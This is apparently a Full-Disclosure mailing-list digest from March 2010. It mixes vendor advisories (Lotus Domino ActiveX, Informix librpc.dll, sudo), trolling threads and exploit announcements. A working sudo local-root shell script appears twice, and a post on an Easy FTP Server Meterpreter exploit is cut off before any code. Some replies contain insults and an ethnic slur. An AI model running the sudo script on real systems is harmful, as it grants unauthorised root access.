[Full-disclosure] iDefense Security Advisory 03.02.10: IBM Lotus Domino Web Access ActiveX Stack Buffer Overflow Vulnerability

2010-03-01 Thread iDefense Labs
iDefense Security Advisory 03.02.10
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 02, 2010

I. BACKGROUND

IBM Lotus Domino includes an ActiveX control called Domino Web Access,
which provides Web-based access for Lotus Notes users. The control
features functionality that is used for uploading files and clearing
the cache upon logout. For more information, see the vendor's site
found at the following link.

http://www-01.ibm.com/software/lotus/products/inotes/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow vulnerability in
IBM Corp.'s Lotus Domino Web Access ActiveX control could allow an
attacker to execute arbitrary code with the privileges of the current
user.

The vulnerable function takes an attacker-controlled URL, and copies it
into a fixed-size stack buffer. No validation checks are performed on
the length of the URL. By passing in a long URL string, it is possible
to trigger a stack-based buffer overflow, resulting in the execution of
arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the Web page. To exploit
this vulnerability, a targeted user must load a malicious Web page
created by an attacker. An attacker typically accomplishes this via
social engineering or injecting content into compromised, trusted
sites. After the user visits the malicious Web page, no further user
interaction is needed.

The vulnerability is a stack-based buffer overflow, and there are no
compiler/runtime protections such as stack cookies or safe exception
handling in the module. As such, reliable exploitation is trivial.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Lotus
Domino Web Access version 8.0.2. Previous versions may also be
affected. The libraries that contain the vulnerable code are dwa8.dll
and dwa8w.dll. IBM states that Lotus Domino Web Access versions 6.5,
7.0 and 8.0 are affected.

V. WORKAROUND

The vulnerable ActiveX controls can be disabled in Internet Explorer by
setting the kill bit for the following CLSIDs:

{3BFFE033-BF43-11d5-A271-00A024A51325}
{983A9C21-8207-4B58-BBB8-0EBC3D7C5505}
{E008A543-CEFB-4559-912F-C27C2B89F13B}

VI. VENDOR RESPONSE

IBM has released a solution which addresses this issue. Information
about downloadable vendor updates can be found by clicking on the URLs
shown.

http://www-01.ibm.com/support/docview.wss?rs=463&uid=swg21421808

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

09/18/2008  Initial Vendor Notification
09/24/2008  Initial Vendor Reply
03/02/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Elazar Broad.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] I have been threatened.

2010-03-01 Thread Rohit Patnaik
Valdis,

Man, why do you even bother responding to this troll?  I mean, I find your
response amusing (as always), but doesn't it eat up a fair amount of your
time to keep responding to this guy?


On Mon, Mar 1, 2010 at 5:07 PM,  wrote:

> On Mon, 01 Mar 2010 22:39:56 GMT, intel unit said:
>
> > SOMEONE HELP.
>
> Take your meds and call us in the morning.  Seriously.
>
> > Yahoo probably hired assassins to take me out. This is probably
> > going to end up on valleywag or something.
>
> (a) Apply Occam's Razor - which is simpler and more likely, that your sorry
> ass is in fact being targeted by Yahoo assassins because you know Important
> Stuff, or you're just having another paranoid episode that manifests as
> thinking assassins are after you because you know Important Stuff? (Hint 1:
> what in the cited text implies assassins?  Zero. Hint 2: What are the
> chances
> that you're valuable enough to be worth a bullet plus the plane ticket for
> the assassin, and you're still unable to get a job in the field?)
>
> (b) Why do you rate a mention on valleywag if it actually happens?
>
> > Sorry guys. I won't be coming back.
>
> ... Yeah, we've heard THAT
> before.
>

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread McGhee, Eddie
Give yourself a break, schizoid. 

-Original Message-
From: intel unit [mailto:n3t...@hush.ai] 
Sent: 01 March 2010 14:53
To: full-disclosure@lists.grok.org.uk; McGhee, Eddie
Subject: RE: [Full-disclosure] full disclosure is an intelligence blackhole


back off kid

"n3td3v" is trying to save lives here

yahoo messenger has 0days. now if gadi evron and the mossad were to get onto 
that, it wouldn't be a good thing, now would it?

On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
 wrote:
>Come on mate seriously its getting boring, if any serious security 
>threats are out there then drop the info and man up, stop with the 
>bullshit of making netdev a poor internet meme, because that's all it 
>is..
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- 
>disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
>Sent: 01 March 2010 08:06
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] full disclosure is an intelligence blackhole
>
>
>John Cartwright is perpetrating global conflict by censoring n3td3v's 
>0days and commenting.
>Opinion by Andrew Wallace. Published by a believer in free speech who 
>knows Andrew Wallace is an super spy expert. Luyk a jelly samwich 
>amirite?
>
>
>Is banning people from a mailing list a national security risk?
>
>We haven't been on the mailing list since January 2009, although there 
>have been plenty of hackers trying to impersonate us.
>
>For sure the impersonations are misleading, and we would like to ask, 
>is banning people from a mailing list a vulnerability?
>
>Let's just say we haven't been able to release any information to the 
>public for over a year now.
>
>We don't have anywhere we can post information.
>
>Isn't it a security risk to ban one the biggest security & intelligence 
>groups in the UK from posting?
>
>We think so, and why would you want to create a climate where there are 
>plenty n3td3v wanna be's posting to the mailing list, but no actual 
>intelligence on what we're upto, what we've been researching or 
>anything like that.
>
>A security & intelligence group with over 6000 security professionals 
>in jobs around the world who make up the n3td3v group, banned from 
>making announcements relating to national security matters.
>
>A whole year of no information getting out to the security industry 
>about the vulnerabilities in national security and other research that 
>we've been getting upto.
>
>None of that has been posted, it's all been suppressed.
>
>By who? One man decided to risk security by banning one of the largest 
>security groups in the United Kingdom.
>
>We were treated badly on the mailing list, it wasn't us in the wrong, 
>we only defended ourselves and the integrity of our group from people 
>who were obviously wanting an argument.
>
>We aren't playing around, we are grown adults who are serious about 
>security & intelligence.
>
>We were made out to be something that we weren't, its not nice to be 
>treated like that.
>
>It's why the mailing list can't be taken seriously and poses a risk to 
>national security.
>
>Because the people who do research security aren't able to post on the 
>mailing list.
>
>And I don't know why more people haven't spoken out about an 
>organisation as big as n3td3v being banned from the mailing list, its a 
>risk to national security.
>
>We don't post our intelligence anywhere else apart from the mailing 
>list we've been banned from, and we don't give out any signals 
>intelligence about what we are getting upto, we're very careful about 
>that.
>
>The only opportunity to find out what the n3td3v security and 
>intelligence group were upto was being subscribed to the mailing list 
>and reading our emails.
>
>Andrew is banned, and banned with that are the voices of over 6000 and 
>more researchers, security consultants and many others.
>
>Is banning n3td3v from Full-disclosure mailing list a national security 
>issue? Of course it is.
>
>National security has been at risk for over a year and will remain at 
>risk... because the information flow has been cut off.
>
>Who will be to blame? One man who runs the mailing list, one man will 
>need to live with himself, his name is John Cartwright.
>
>He has cut off a major security research and intelligence group on 
>purpose, I don't think he cares about national security.
>
>Can he live with himself?
>
>We've been sitting in our offices wondering this for over a year, we've 
>held security conferences with our members and other stuff and remain 
>frustrated that we've been cut off from communicating with the security 
>industry.
>
>Yours faithfully,
>
>n3td3v security
>& intelligence group

Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

2010-03-01 Thread Larry Seltzer
Thanks SkyLined. I was confused a bit but I held off writing anything
till I understood it better. 

 

Getting back on to the point I think you were trying to make, you imply
that 32-bit address space is insufficient for the randomization in ASLR.
Actually now don't they only use 256 randomization slots? The point of
it is that if you're going to crash the system 255 out of 256 times it's
not worth attacking.

 

Larry Seltzer

 

From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Berend-Jan Wever
Sent: Monday, March 01, 2010 7:41 PM
To: Full-disclosure; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

 

It seems my English is not as good as I thought and I accidentally led
Ryan Naraine, Larry Seltzer and probably others to come to conclusions
such as that I released a weaponized 0-day that bypasses both ASLR+DEP
in current versions of MSIE and Windows using a completely new technique
and that I did so as a Google employee.

 

However, let me try to explain better and to correct any ambiguity I may
have created in my first blog post:

- I have recently released an exploit that I developed in 2005 (before I
was employed by either MS or Google).

- I am releasing this as an individual as part of my new-years
resolution to dump random stuff from my harddisk onto the tubes. (I have
a personal interest in security outside of my work, every now and then I
find enough time to work on and release stuff like this).

- The exploit targets a bug that was fixed in 2005, that only affected
MSIE 6.0 and earlier.

- The exploit shows how to implement the well known ret-into-libc
technique (using a heap spray) to bypass DEP.

 

- The exploit does not contain anything that is not already public,
other than how to implement a ret-into-libc using a heap-spray to
exploit complex memory corruption bugs such as the DHTML race condition
it targets.

- The exploit does not bypass ASLR.

- Using ret-into-libc to bypass DEP affects any application that has a
vulnerability that allows an attacker to use a ret-into-libc attack -
this is not MSIE specific. 

 

I hope this helps clarify some things. But, not being a native English
speaker, I may inadvertently have said things completely wrong again. I
look forward to correcting my mistakes as they show up on other news
sites in the future.

 

Cheers,

SkyLined


Berend-Jan Wever 
http://skypher.com/SkyLined




On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever
 wrote:

Hey all,

 

I released a version of my Internet Exploiter 2 exploit from 2005 that
bypasses DEP. If you are familiar with my Internet Exploiter series of
exploits and/or are interested in how to use heap-spraying to bypass
DEP, you may like this:

http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/

 

Cheers,

SkyLined


Berend-Jan Wever 
http://skypher.com/SkyLined

 


Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP

2010-03-01 Thread Berend-Jan Wever
It seems my English is not as good as I thought and I accidentally led Ryan
Naraine, Larry Seltzer and probably others to come to conclusions such as
that I released a weaponized 0-day that bypasses both ASLR+DEP in current
versions of MSIE and Windows using a completely new technique and that I did
so as a Google employee.

However, let me try to explain better and to correct any ambiguity I may
have created in my first blog post:
- I have recently released an exploit that I developed in 2005 (before I was
employed by either MS or Google).
- I am releasing this as an individual as part of my new-years resolution to
dump random stuff from my harddisk onto the tubes. (I have a personal
interest in security outside of my work, every now and then I find enough
time to work on and release stuff like this).
- The exploit targets a bug that was fixed in 2005, that only affected MSIE
6.0 and earlier.
- The exploit shows how to implement the well known ret-into-libc technique
(using a heap spray) to bypass DEP.

- The exploit does not contain anything that is not already public, other
than how to implement a ret-into-libc using a heap-spray to exploit complex
memory corruption bugs such as the DHTML race condition it targets.
- The exploit does not bypass ASLR.
- Using ret-into-libc to bypass DEP affects any application that has a
vulnerability that allows an attacker to use a ret-into-libc attack - this
is not MSIE specific.

I hope this helps clarify some things. But, not being a native English
speaker, I may inadvertently have said things completely wrong again. I look
forward to correcting my mistakes as they show up on other news sites in the
future.

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined



On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever
wrote:

> Hey all,
>
> I released a version of my Internet Exploiter 2 exploit from 2005 that
> bypasses DEP. If you are familiar with my Internet Exploiter series of
> exploits and/or are interested in how to use heap-spraying to bypass DEP,
> you may like this:
> http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/
>
> Cheers,
> SkyLined
> 
> Berend-Jan Wever 
> http://skypher.com/SkyLined
>
>

Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching

2010-03-01 Thread root
Malisimo

Kingcope wrote:
> Just for the record.
> 
> ---snip---
> #!/bin/sh
> # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> # local root exploit
> # March 2010
> # automated by kingcope
> # Full Credits to Slouching
> echo Tod Miller Sudo local root exploit
> echo by Slouching
> echo automated by kingcope
> if [ $# != 1 ]
> then
> echo "usage: ./sudoxpl.sh "
> exit
> fi
> cd /tmp
> cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
> chmod a+x ./sudoedit
> sudo ./sudoedit $1
> --snip---
> 
> cheers,
> kingcope
> 


Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts

2010-03-01 Thread intel unit

Yahoo has a ton of cash and a lot of experience put into making a
great experience.

But they do have those embarrassing security flaws you just
mentioned.

Also, they're not even using cellphone calling or having real
people man cracked email accounts. Instead they let 15 year old
4channers backdoor you.

The most secure way to fortify your mail to scramble your forgotten
pw's, and if you do that, and you lose your pw, You're toast.

I'm sure yahoo also has some shitty last 4 # of your CC.

Google's way of doing it is superior. They hire pakis to do that
stuff.

Yahoo is amazing in many aspects (for years they had a great
directory, and even today have superb search), but I never had the
impression that security was their strongpoint.

I wouldn't trust my mail or personal data with them.

On Mon, 01 Mar 2010 23:23:24 + brian moore  wrote:
>On Sat, 27 Feb 2010 12:42:30 -0800
>mark seiden  wrote:
>
>> it's true that yahoo is hiring security people, though,
>typically not as consultants
>> but as employees -- programmers and engineers who are clueful
>about
>> security.
>
>Really?
>
>Cause they could sure use some (Considering the spam I get
>from Yahoo, where the
>Yahoo abuse people deny that web113903.mail.gq1.yahoo.com
>[98.136.167.123] is part of Yahoo.)
>
>I'd say you have a serious security problem, since if that's true,
>someone has compromised
>your DNS servers as well as records at ARIN that say Yahoo owns
>that network.
>
>Received: from n64.bullet.mail.sp1.yahoo.com
>(n64.bullet.mail.sp1.yahoo.com [98.136.44.189])
>   by mailhost.cmc.net (Postfix) with SMTP id 7CA5C29EB0A
>   for ; Tue, 23 Feb 2010 09:59:41 -0800 (PST)
>
>That didn't come from Yahoo, either, according to your employees.
>
>Received: from n21.bullet.mail.mud.yahoo.com
>(n21.bullet.mail.mud.yahoo.com [68.142.206.160])
>   by bert.cmc.net (Postfix) with SMTP id 805631F918
>   for ; Sat, 20 Feb 2010 06:31:13 -0800 (PST)
>
>That didn't come from Yahoo either...
>
>Looks like someone is totally having a field day with your DNS
>servers and ARIN, because it certainly
>can't be that your abuse staff is completely incompetent and
>ignoring spam complaints with lies
>about it not coming from Yahoo.
>


Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts

2010-03-01 Thread brian moore
On Sat, 27 Feb 2010 12:42:30 -0800
mark seiden  wrote:

> it's true that yahoo is hiring security people, though, typically not as 
> consultants
> but as employees -- programmers and engineers who are clueful about 
> security.  

Really?

Cause they could sure use some (Considering the spam I get from Yahoo, 
where the
Yahoo abuse people deny that web113903.mail.gq1.yahoo.com [98.136.167.123] is 
part of Yahoo.)

I'd say you have a serious security problem, since if that's true, someone has 
compromised
your DNS servers as well as records at ARIN that say Yahoo owns that network.

Received: from n64.bullet.mail.sp1.yahoo.com (n64.bullet.mail.sp1.yahoo.com 
[98.136.44.189])
by mailhost.cmc.net (Postfix) with SMTP id 7CA5C29EB0A
for ; Tue, 23 Feb 2010 09:59:41 -0800 (PST)

That didn't come from Yahoo, either, according to your employees.

Received: from n21.bullet.mail.mud.yahoo.com (n21.bullet.mail.mud.yahoo.com 
[68.142.206.160])
by bert.cmc.net (Postfix) with SMTP id 805631F918
for ; Sat, 20 Feb 2010 06:31:13 -0800 (PST)

That didn't come from Yahoo either...

Looks like someone is totally having a field day with your DNS servers and 
ARIN, because it certainly
can't be that your abuse staff is completely incompetent and ignoring spam 
complaints with lies
about it not coming from Yahoo.



[Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching

2010-03-01 Thread Kingcope
Just for the record.

---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
--snip---

cheers,
kingcope



Re: [Full-disclosure] I have been threatened.

2010-03-01 Thread Valdis . Kletnieks
On Mon, 01 Mar 2010 22:39:56 GMT, intel unit said:

> SOMEONE HELP.

Take your meds and call us in the morning.  Seriously.

> Yahoo probably hired assassins to take me out. This is probably
> going to end up on valleywag or something.

(a) Apply Occam's Razor - which is simpler and more likely, that your sorry
ass is in fact being targeted by Yahoo assassins because you know Important
Stuff, or you're just having another paranoid episode that manifests as
thinking assassins are after you because you know Important Stuff? (Hint 1:
what in the cited text implies assassins?  Zero. Hint 2: What are the chances
that you're valuable enough to be worth a bullet plus the plane ticket for
the assassin, and you're still unable to get a job in the field?)

(b) Why do you rate a mention on valleywag if it actually happens?

> Sorry guys. I won't be coming back.

... Yeah, we've heard THAT 
before.



[Full-disclosure] ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability

2010-03-01 Thread ZDI Disclosures
ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-023
March 1, 2010

-- CVE ID:
CVE-2009-2754

-- Affected Vendors:
IBM
EMC

-- Affected Products:
IBM Informix
EMC NetWorker

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5945. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of both IBM Informix Dynamic Server and EMC
Legato Networker. User interaction is not required to exploit this
vulnerability.

The specific flaw exists within the RPC protocol parsing library,
librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound
by default to TCP port 36890. During authentication, a lack of a proper
signedness check on a supplied parameter size can result in exploitable
stack based buffer overflow leading to arbitrary code execution under
the context of the SYSTEM user.

-- Vendor Responses:
IBM states:
This issue was first fixed in: IDS 10.00.TC9, IDS
11.10.TC3 Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3 4.
URL to APAR or fixpack Fix pack download URL:
http://www-933.ibm.com/support/fixcentral/
APAR URLs 
 http://www.ibm.com/support/docview.wss?uid=swg1IC55329
 http://www.ibm.com/support/docview.wss?uid=swg1IC55330

EMC states:
EMC has released a Security Advisory (ESA-08-007) identifier to
customers through Powerlink.

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2010-03-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.ap...@siberas.de)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/


[Full-disclosure] I have been threatened.

2010-03-01 Thread intel unit

MY NAME IS ANDREW WALLACE AND I AM BEING BUGGED OUT OF MY MIND BY
THE INTELLIGENCE ESTABLISHMENT.

SOMEONE HELP.

Yahoo probably hired assassins to take me out. This is probably
going to end up on valleywag or something.

Sorry guys. I won't be coming back.

- - Forwarded message from Henri Torgemane  -
- 
Hello, I was taken off list, but let me fwd this.

Thanks

- - Forwarded message from mark seiden  -
if you think i'm going to take you up on your troll and contaminate
the list
with something that doesn't interest them, you're wrong.

just go away.


On Feb 28, 2010, at 7:02 PM, Henri Torgemane wrote:

>
> Yes.
>
> To clarify, this post was meant to be satirical. It was not
written
> by an employee at Yahoo. I apologize for mentioning age. (In the
> United States, you're not allowed to mention age, creed, gender,
> etc. in terms of hiring new guys)
>
> However, I have a question for you Mark.
>
> What is your opinion on Andrew Wallace and "n3td3v"? Would Yahoo!
> consider vouching for him after all the high-value intel he's
given
> you?
>
>
> On Sat, 27 Feb 2010 20:42:30 + mark seiden 
> wrote:
>> yet another nice troll with a stylistic stench of n3td3v about
it,
>> judging by
>> the fanciful misconceptions surrounding a kernel of truth
>> (and the phony attribution to someone to whom he's taken an
>> unreasonable
>> disliking...)
>>
>> it's true that yahoo is hiring security people, though, typically
>> not as consultants
>> but as employees -- programmers and engineers who are clueful
>> about
>> security.
>>
>> careers.yahoo.com is a good way, in fact,  to find out about
those
>> jobs.  at rough count
>> 50 jobs in the US (mostly bay area) with the word "security" in
>> their abstract, and a
>> sizeable number in india, asia, and europe accessible off
separate
>> links.
>>
>> also, there are particularly numerous jobs for "service
>> engineering" pros,
>> people who are good at production services delivery at a very
>> large scale.
>>
>> if there are qualified applicants on this list (or your friends)
>> who want their name put
>> in for something particular, happy to refer them (i'd even get a
>> referral incentive).
>>
>> btw, please mention the  specific posted position(s) that you
>> think would suit you.
>>
>> (you don't have to be 25-35.  in fact, such a requirement would
>> not be
>> legal under US labor law...).
>>
>>
>> On Feb 27, 2010, at 9:25 AM, Henri Torgemane wrote:
>>
>>>
>>>
>>> http://careers.yahoo.com/
>>>
>>> Looking for a dream job?
>>>
>>> Yahoo! is hiring security consultants worldwide 25-35 to help
>> join
>>> our new Cyber Security Task Force.
>>>
>>> We are working with the government to provide a security service
>>> for our web and messenger platforms. Especially people with
>>> experience harvesting vital intelligence, which is the life
>> blood
>>> of our security system. All aspects of security, risk
>> management,
>>> analysis. We embody the paranoid, professional spirit of
>>> corporatism. With delight (and muffins!)
>>>
>>> At Yahoo!, big thinking comes with the territory. When your work
>>> reaches over half a billion users--that's 1 out of every 2
>> people
>>> online--there's no small task. We need creative minds that can
>> take
>>> us new places. Individuals who want to positively impact their
>>> career--and the world at large. We're looking for Big Thinkers
>> who
>>> embody the fun, innovative, collaborative spirit that's uniquely
>>> Yahoo!.
>>>
>>> We're looking for people like you. To protect it.
>>>
>>> I look forward to seeing your applications. Let's protect our
>> data.
>>> Let's create the future, together.
>>>
>>> Henri Torgemane

[Full-disclosure] ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities

2010-03-01 Thread ZDI Disclosures
ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution 
Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-022
March 1, 2010

-- CVE ID:
CVE-2009-2753

-- Affected Vendors:
IBM

-- Affected Products:
IBM Informix

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5937. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of both IBM Informix Dynamic Server and EMC
Legato Networker. User interaction is not required to exploit this
vulnerability.

The specific flaws exist within the RPC protocol parsing library,
librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound
by default to TCP port 36890. During authentication, a lack of proper
sanity checking on supplied parameter sizes can result in exploitable
stack and heap based buffer overflows leading to arbitrary code
execution under the context of the SYSTEM user.

-- Vendor Response:
IBM states that this issue was first fixed in: IDS 10.00.TC9, IDS 11.10.TC3
Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3
4. URL to APAR or fixpack
Fix pack download URL:
http://www-933.ibm.com/support/fixcentral/
APAR URLs:
 http://www.ibm.com/support/docview.wss?uid=swg1IC55329
 http://www.ibm.com/support/docview.wss?uid=swg1IC55330

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2010-03-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.ap...@siberas.de)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2010:052 ] sudo

2010-03-01 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:052
 http://www.mandriva.com/security/
 ___

 Package : sudo
 Date: March 1, 2010
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in sudo:
 
 sudo 1.6.x before 1.6.9p21, when the runas_default option is used,
 does not properly set group memberships, which allows local users to
 gain privileges via a sudo command (CVE-2010-0427).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
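
The sudo advisory above names two conditions for CVE-2010-0427: a sudo 1.6.x release before 1.6.9p21, and use of the runas_default option. The following script checks both on a host. It is an added example, not part of the Mandriva advisory; the function names and the sample sudoers content are constructed, and it compares upstream version strings as printed by `sudo -V`, not distribution package releases.

```shell
#!/bin/sh
# Added example: check the two preconditions of CVE-2010-0427 named in the
# advisory. Function names and the sample sudoers text are constructed.

# Succeeds when $1 is an upstream sudo 1.6.x version older than 1.6.9p21,
# e.g. "1.6.8", "1.6.9" or "1.6.9p17". Anything else fails.
sudo_1_6_before_9p21() {
    case $1 in
        1.6.*) rest=${1#1.6.} ;;      # "9p17", "8", ...
        *)     return 1 ;;
    esac
    patch=${rest%%p*}                 # third version component
    case $rest in
        *p*) plevel=${rest#*p} ;;     # patch level after the "p"
        *)   plevel=0 ;;
    esac
    # Refuse strings that are not plain numbers (package release suffixes etc.).
    case $patch  in ''|*[!0-9]*) return 1 ;; esac
    case $plevel in ''|*[!0-9]*) return 1 ;; esac
    if [ "$patch" -lt 9 ]; then return 0; fi
    if [ "$patch" -eq 9 ] && [ "$plevel" -lt 21 ]; then return 0; fi
    return 1
}

# Prints every Defaults entry in sudoers file $1 that sets runas_default.
# Backslash-continued lines are joined and comments are ignored.
runas_default_lines() {
    awk '
        { line = pending $0; pending = "" }
        line ~ /\\$/ { sub(/\\$/, "", line); pending = line; next }
        {
            sub(/^#.*/, "", line)        # whole-line comment
            sub(/[ \t]#.*/, "", line)    # trailing comment
            if (line ~ /^[ \t]*Defaults/ && line ~ /[ \t,]runas_default[ \t]*=/)
                print line
        }
    ' "$1"
}

# Succeeds only when both conditions hold: affected version range ($1)
# and runas_default present in the sudoers file ($2).
cve_2010_0427_exposed() {
    sudo_1_6_before_9p21 "$1" || return 1
    [ -n "$(runas_default_lines "$2")" ]
}

# Constructed sudoers content used to exercise the checks offline.
sample_sudoers() {
    cat <<'EOF'
# constructed sample
Defaults env_reset
# Defaults runas_default=olduser
Defaults:%ops \
    runas_default=appsvc
root ALL=(ALL) ALL
EOF
}

# Demo on the constructed sample.
demo_file=$(mktemp)
sample_sudoers > "$demo_file"
for v in 1.6.9p17 1.6.9p21; do
    if cve_2010_0427_exposed "$v" "$demo_file"; then
        echo "sudo $v + runas_default: exposed"
    else
        echo "sudo $v: not in the affected range or option unused"
    fi
done
rm -f "$demo_file"

# On a real host (version string from the first line of `sudo -V`):
#   ver=$(sudo -V | sed -n '1s/^Sudo version //p')
#   cve_2010_0427_exposed "$ver" /etc/sudoers && echo "review this host"
```

The updated Mandriva packages keep the 1.6.9p17 version string, so on a patched Mandriva system a hit from the version check means "confirm the installed package release", not "vulnerable".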


Re: [Full-disclosure] Person impersonating

2010-03-01 Thread Stuart Carter
... who the fuck cares?


Go away.



andrew.wallace wrote:
> If you haven't noticed yet guys it's not me.
> 
> Why keep some youngster like that going by letting the list think it's me?
> 
> Andrew



Re: [Full-disclosure] Easy FTP Server 1.7.0.2 Remote BoF

2010-03-01 Thread my.hndl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I expanded on Jon Butler's exploit and was able to inject a Meterpreter
payload into the remote process despite the buffer's small size (268
bytes).  This was done by overwriting the ret value with part of the
Meterpreter payload.

- - Explanation of Process:
